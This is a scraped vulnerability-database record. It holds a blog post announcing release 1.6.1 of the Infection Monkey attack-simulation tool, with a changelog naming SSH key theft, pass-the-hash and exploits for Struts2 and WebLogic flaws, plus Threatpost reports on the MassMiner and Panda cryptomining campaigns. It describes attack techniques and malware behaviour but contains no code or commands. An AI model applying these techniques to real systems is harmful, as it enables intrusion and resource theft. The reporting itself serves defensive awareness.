DATABASE RESOURCES PRICING ABOUT US

{"id": "PENTESTIT:F5DFB26B34C75683830E664CBD58178F", "type": "pentestit", "bulletinFamily": "blog", "title": "UPDATE: Infection Monkey 1.6.1", "description": "PenTestIT RSS Feed\n\nI'm sure you must have read my previous post title the [List of Adversary Emulation Tools](<http://pentestit.com/adversary-emulation-tools-list/>). In that post, I briefly mentioned about the Guardicore Infection Monkey. Good news now is that it has been updated! We now have **Infection Monkey 1.6.1**. An important change about this version is that this is an AWS only version.\n\n[](< http://pentestit.com/update-infection-monkey-1-6-1/>) \n\n\nWhat is Infection Monkey?\n\n> The Infection Monkey is an open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement. It operates in much the same way a real attacker would - starting from a random location in the network and propagating from there, while looking for all possible paths of exploitation.\n\n## Infection Monkey 1.6.1 Changes:\n\nInfection Monkey 1.6.1 has now been integrated with the AWS Security Hub. This allows anyone to verify and test the resilience of their AWS environment and correlate this information with the native security solutions and benchmark score!\n\nAdditionally, I missed posting about another release - **Infection Monkey 1.6** which is also important. Hence, I'm posting about it here:\n\n## Infection Monkey 1.6 Change Log:\n\n**New Features:**\n\n * Detect cross segment traffic! The Monkey can now easily test whether two network segments are properly separated. PR [#120](<https://github.com/guardicore/monkey/pull/120>).\n * The Monkey can analyse your domain for possible Pass the Hash attacks. By cross referencing information collected by Mimikatz, the Monkey can now detect usage of identical passwords, cached logins with access to critical servers and more. [#170](<https://github.com/guardicore/monkey/pull/170>)\n * SSH key stealing. The monkey will now steal accessible SSH keys and use them when connecting to SSH servers, PR [#138](<https://github.com/guardicore/monkey/pull/138>).\n * Implement a cross platform attack for [Struts2 Multi-part file upload vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-045>), PR [#179](<https://github.com/guardicore/monkey/pull/179>).\n * Implement a cross platform attack for Oracle Web Logic CVE-2017-10271, PR [#180](<https://github.com/guardicore/monkey/pull/180>).\n * ElasticGroovy attack now supports Windows victims, PR [#181](<https://github.com/guardicore/monkey/pull/181>).\n * Hadoop cluster RCE - Abuse unauthenticated access to YARN resource manager, PR [#182](<https://github.com/guardicore/monkey/pull/182>).\n\n**Code improvements:**\n\n * We've refactored the codebase, so now it's easier to share code between the Monkey and the Monkey Island components. PR [#145](<https://github.com/guardicore/monkey/pull/145>).\n * Mimikatz is now bundled into a password protected ZIP file and extracted only if required. Makes deployment easier with AV software. PR [#169](<https://github.com/guardicore/monkey/pull/169>).\n * Monkey Island now properly logs itself to a file and console. So if you got bugs, it'll now be easier to figure them out. PR [#139](<https://github.com/guardicore/monkey/pull/139>).\n * Systemd permissions are now properly locked down\n * Fixed a situation where a successful shellshock attack could freeze the attacking Monkey. [#200](<https://github.com/guardicore/monkey/pull/200>)\n\nIn other words, the Monkey can now detect potential attack paths between computers within the same domain or workgroup using credentials reuse, pass-the-hash technique and cached logins. In addition to the already existing attacks, Infection Monkey 1.6.1 now includes support for the Struts2 Multipart file upload vulnerability (CVE-2017-5638), Oracle WebLogic Server WLS Security component vulnerability (CVE-2017-10271), Elasticsearch Groovy attack (CVE 2015-1427) &amp; the Hadoop YARN Resource Manager remote code execution vulnerability.\n\nLot's of exciting stuff from the guys at Guardicore Labs. Really good work!\n\n## Download Infection Monkey 1.6.1:\n\nThe following Infection Monkey 1.6.1 files are available for download:\n\n 1. infection_monkey_1.6.1_AWS_only.zip\n 2. infection_monkey_1.6.1_AWS_only.tar.gz\n\nGet them **[here](<https://github.com/guardicore/monkey/releases/tag/infection_monkey_1.6.1_AWS_only>)**.\n\nThe post [UPDATE: Infection Monkey 1.6.1](<http://pentestit.com/update-infection-monkey-1-6-1/>) appeared first on [PenTestIT](<http://pentestit.com>).", "published": "2018-12-03T22:28:53", "modified": "2018-12-03T22:28:53", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "http://pentestit.com/update-infection-monkey-1-6-1/", "reporter": "Black", "references": [], "cvelist": ["CVE-2017-10271", "CVE-2017-5638"], "lastseen": "2018-12-03T23:18:27", "viewCount": 3923, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879", "BAM-18242", "CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:7992242A-E0F4-4572-BE13-859467611F09", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-1088"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2017-10271", "CVE-2017-5638"]}, {"type": "exploitdb", "idList": ["EDB-ID:43392", "EDB-ID:43458", "EDB-ID:43924"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "EXPLOITPACK:E47A4ABCB334901131160C872A570166"]}, {"type": "f5", "idList": ["F5:K43451236"]}, {"type": "fireeye", "idList": ["FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:42E1F284AEBD41C72EC6CD12CDCCD0A6", "FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "FIREEYE:C097B41677EDE5F95DB4B84AD6726751"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["7BA07704-21CC-5BFC-A0F9-8FDA2BC84402"]}, {"type": "hackerone", "idList": ["H1:576887"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201786819", "MYHACK58:62201890758", "MYHACK58:62201891264", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["700055.PRM", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "WEBLOGIC_2017_10271.NASL", "WEB_APPLICATION_SCANNING_112726"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310811244"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUAPR2017-3236618", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2017-3236622", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2017-3236626"]}, {"type": "osv", "idList": ["OSV:GHSA-J77Q-2QQG-6989"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:146143"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:484D58D595B8F6CEE787306160971308", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33", "SECURELIST:C7E3F6A27205B506CE8683317323C0BC"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804", "SSV:97009"]}, {"type": "symantec", "idList": ["SMNTC-101304"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "TALOSBLOG:7B703A19FAC4E490CFFB2AE43C1606DF", "TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:4DE731C9D113C3993C96A773C079023F", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:AF93AEDBDE6169AD1163D53979A4EA04", "THN:EEB3BA59922DDC6B345B8E6C153593DA", "THN:F03064A70C65D9BD62A8F5898BA276D2"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:555BCC102B10B8C6CABB0054595AC756", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E43EB029B562B5665C8385E16145288A", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5638"]}, {"type": "vmware", "idList": ["VMSA-2017-0004", "VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-29395", "1337DAY-ID-29668"]}]}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:7992242A-E0F4-4572-BE13-859467611F09", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-1088"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2015-1427", "CVE-2017-5638"]}, {"type": "exploitdb", "idList": ["EDB-ID:43458", "EDB-ID:43924"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E47A4ABCB334901131160C872A570166"]}, {"type": "f5", "idList": ["F5:K43451236"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["2ED15233-2A01-53F8-A939-8A4D06481CF4", "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "B41082A1-4177-53E2-A74C-8ABA13AA3E86"]}, {"type": "hackerone", "idList": ["H1:576887"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE", "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379"]}, {"type": "nessus", "idList": ["STRUTS_2_5_10_1_WIN_LOCAL.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2017-3236626"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:146143"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:ACD3479531482E2CA5A8E15EB6B47523"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E43EB029B562B5665C8385E16145288A", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB"]}, {"type": "vmware", "idList": ["VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-29668"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-10271", "epss": "0.975240000", "percentile": "0.999740000", "modified": "2023-03-14"}, {"cve": "CVE-2017-5638", "epss": "0.975380000", "percentile": "0.999830000", "modified": "2023-03-14"}], "vulnersScore": 0.3}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660012827, "score": 1683995972, "epss": 1678874978}, "_internal": {"score_hash": "24335a9059d887ba0e5c5728ba5248f6"}}

{"threatpost": [{"lastseen": "2019-04-25T05:49:59", "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. \u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "cvss3": {}, "published": "2018-05-03T20:26:37", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. \u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. \u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administers should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that has hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. **__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "cvss3": {}, "published": "2019-09-17T21:04:35", 